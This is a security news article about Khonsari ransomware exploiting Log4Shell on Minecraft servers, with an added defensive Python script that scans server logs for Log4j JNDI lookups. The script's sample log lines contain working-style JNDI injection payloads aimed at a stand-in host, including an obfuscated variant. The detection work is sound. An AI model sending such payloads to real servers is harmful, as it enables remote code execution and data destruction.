Khonsari ransomware attacks Minecraft servers

Microsoft urged administrators of private Minecraft servers (those running on their own hosting) to update to the latest versions as soon as possible, as they are being attacked by the Khonsari ransomware, which exploits the critical Log4Shell vulnerability.

Last week, the developers behind Minecraft at Mojang Studios released an emergency security update to address the critical bug CVE-2021-44228.

This issue, discovered in the Log4j logging library in recent weeks, has been discussed around the world. The vulnerability is also known as Log4Shell and has the potential to become one of the worst bugs in recent years.

In Minecraft, the Log4j library is used by the Java Edition game client and multiplayer servers. Microsoft has now warned that the new vulnerability is already being actively used to attack private servers.

"The attacker sends a malicious in-game message to the vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute the payload placed by the attacker on both the server and connected vulnerable clients. We saw the use of a malicious Java class, which is the Khonsari ransomware and is executed in the context of javaw.exe, to then demand a ransom," Microsoft said.
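As an added example (not from Microsoft or the original article), the following Python code shows how a defender could flag log lines that carry a Log4j JNDI lookup, the mechanism behind CVE-2021-44228, including lookups hidden inside nested expressions. The log lines, the `host.invalid` name and all function names are constructed for illustration, and the check assumes the raw message text is available, for example in a patched server's log.

```python
import re

# Innermost Log4j lookup: "${...}" with no further "${" nested inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# Chat line shape used by the constructed sample below.
CHAT = re.compile(r"^\[[\d:]+\] \[[^\]]+\]: <(?P<player>[^>]+)> ")

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    "[12:00:01] [Server thread/INFO]: <Alex> anyone want to trade?",
    "[12:00:07] [Server thread/INFO]: <guest1> ${jndi:ldap://host.invalid/a}",
    "[12:00:09] [Server thread/INFO]: <guest2> ${${lower:J}ndi:ldap://host.invalid/a}",
    "[12:00:12] [Server thread/INFO]: <Steve> my name is ${name}",
]


def _collapse(match):
    """Approximate the text Log4j substitutes for one innermost lookup."""
    body = match.group(1)
    key, _, rest = body.partition(":")
    if key.strip().lower() in ("lower", "upper"):
        return rest                       # ${lower:J} -> J
    if ":-" in body:
        return body.split(":-", 1)[1]     # ${x:-j} -> default value "j"
    return match.group(0)                 # unknown lookup: leave untouched


def contains_jndi_lookup(text, max_rounds=10):
    """True if text holds a lookup that resolves to ${jndi:...}."""
    for _ in range(max_rounds):
        if "${jndi:" in text.lower():
            return True
        collapsed = INNER.sub(_collapse, text)
        if collapsed == text:
            return False
        text = collapsed
    return "${jndi:" in text.lower()


def scan_log(lines):
    """Return (line_number, player_or_None) for each suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if contains_jndi_lookup(line):
            chat = CHAT.match(line)
            hits.append((number, chat.group("player") if chat else None))
    return hits


if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

A hit is a reason to review the server and the clients that were connected at that time; it does not replace installing the update.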

Microsoft 365 Defender Threat Intelligence and Microsoft Threat Intelligence Center (MSTIC) also report that they observed PowerShell-based reverse shells deployed on corporate endpoints, where Log4j exploits targeting Minecraft servers were just an entry point.

As a result, Microsoft has asked all administrators to immediately install the latest updates to protect against attacks, and recommends that players connect only to trusted Minecraft servers and use the official and latest version of the client. Minecraft: Java Edition server administrators can find all necessary update instructions here.

At first glance, this malware appears to be exploiting the Log4Shell problem for ransomware attacks. However, in reality, Khonsari is more like a wiper, that is, it is destructive malware that deliberately encrypts data beyond recovery. The fact is that the victims cannot contact the malware operators to pay the ransom (there are simply no contacts in the message that the extortionists leave behind), which means they cannot save their information.

Apparently, the attacks on Minecraft servers that have begun now are also carried out solely for the sake of griefing and trolling, and the malware operators do not pursue financial gain.

Let me remind you that we wrote that Researchers discovered ALPHV ransomware written in Rust, as well as that Chaos ransomware attacks Minecraft players.

Helga Smith

I have always been interested in computer science, especially data security and the subject that is nowadays called "data science", since my early teens. Before joining the Virus Removal team as editor-in-chief, I worked as a cybersecurity expert at several companies, including one of Amazon's contractors. Another experience: I teach at Arden and Reading universities.
